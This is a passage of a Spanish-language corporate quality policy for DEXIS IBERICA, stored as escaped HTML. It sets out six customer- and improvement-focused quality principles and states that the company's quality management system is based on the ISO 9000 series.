Seg\u00fan lo cual, el principio y fin de nuestra gesti\u00f3n debe ser orientar nuestros esfuerzos hacia ofrecer a nuestros clientes, cumpliendo sus requisitos, a la primera y de forma inmediata, lo que esperan de nuestros productos y capacidad de servicio. La cultura de calidad de nuestra organizaci\u00f3n se resume en seis puntos:<\/p>\n<p>1. Nuestra primera y \u00faltima meta debe ser satisfacer, o incluso superar, las expectativas razonables de nuestros clientes, no s\u00f3lo en relaci\u00f3n a los productos, sino tambi\u00e9n en el cumplimiento de los plazos, la conciencia y ajuste de los costes, y el resto de consideraciones relativas al servicio. As\u00ed mismo debemos buscar continuamente mejoras en la calidad, coste y nivel de servicio que damos.<\/p>\n<p>2. La orientaci\u00f3n al cliente debe ser la base generalizada de todo el esfuerzo. Entendiendo como cliente no s\u00f3lo el externo, comprador de nuestros productos, sino tambi\u00e9n el interno, siguiente secci\u00f3n o departamento en el orden de los procesos.<\/p>\n<p>3. El trabajo debe realizarse correctamente desde el principio, evitando defectos en vez de subsanarlos posteriormente. Hay pues que dar <strong>prioridad a la prevenci\u00f3n de los defectos<\/strong> para evitar corregirlos cuando aparezcan. Por ello hay que hacer las cosas bien a la primera.<\/p>\n<p>4. La calidad de nuestros productos y servicios est\u00e1 muy influenciada por la calidad de los productos comprados y las prestaciones de los servicios contratados. Por ello colaboramos estrechamente con los proveedores en este fin.<\/p>\n<p>5. Cada componente de DEXIS IBERICA debe conocer qui\u00e9nes son sus clientes y lo que esperan de su trabajo. La Direcci\u00f3n General deber\u00e1 obtener el compromiso por la calidad de todos los empleados de la organizaci\u00f3n, como una responsabilidad colectiva. Se impulsar\u00e1 que los empleados cumplan su compromiso con la calidad participando en programas de mejora continua.<\/p>\n<p>6. Resultado del an\u00e1lisis del entorno interno y externo de nuestra organizaci\u00f3n se han identificado como objetivos prioritarios para cada delegaci\u00f3n: La mejora de la calidad de nuestra gesti\u00f3n de stocks, el aumento de la cuota de mercado y de la facturaci\u00f3n, la optimizaci\u00f3n del fondo de comercio, la calidad de formaci\u00f3n de nuestro equipo humano, el desarrollo de nuestros procesos inform\u00e1ticos, as\u00ed como la solvencia y fiabilidad de nuestros proveedores. Estos Objetivos se logran mediante el trabajo en equipo de todos los integrantes de la organizaci\u00f3n, buscando la motivaci\u00f3n, la plena integraci\u00f3n y la satisfacci\u00f3n de todo el personal, en aras de la mejora continua. Todo lo anterior se lograr\u00e1 gestionando adecuadamente la comunicaci\u00f3n entre todos los empleados, de forma que se puedan aprovechar las sinergias existentes, de una forma m\u00e1s eficaz.<\/p>\n<p><strong>Nuestro Sistema de Gesti\u00f3n de la Calidad se basa en la familia de normas de la serie UNE-EN- ISO 9000.<\/strong> \u00c9ste no describe una situaci\u00f3n est\u00e1tica, sino que, al igual que en el resto de nuestros procesos, perseguimos el principio de mejora continua.<\/p>\n<p>Los requisitos de nuestro Sistema de Gesti\u00f3n de la Calidad son preceptivos para todo el personal de la empresa en la medida que les aplique. El personal tiene la obligaci\u00f3n de conocerlos y cumplirlos, exigencia extensible a los requisitos legales y\/o reglamentarios que puedan afectar al producto comercializado, cuando
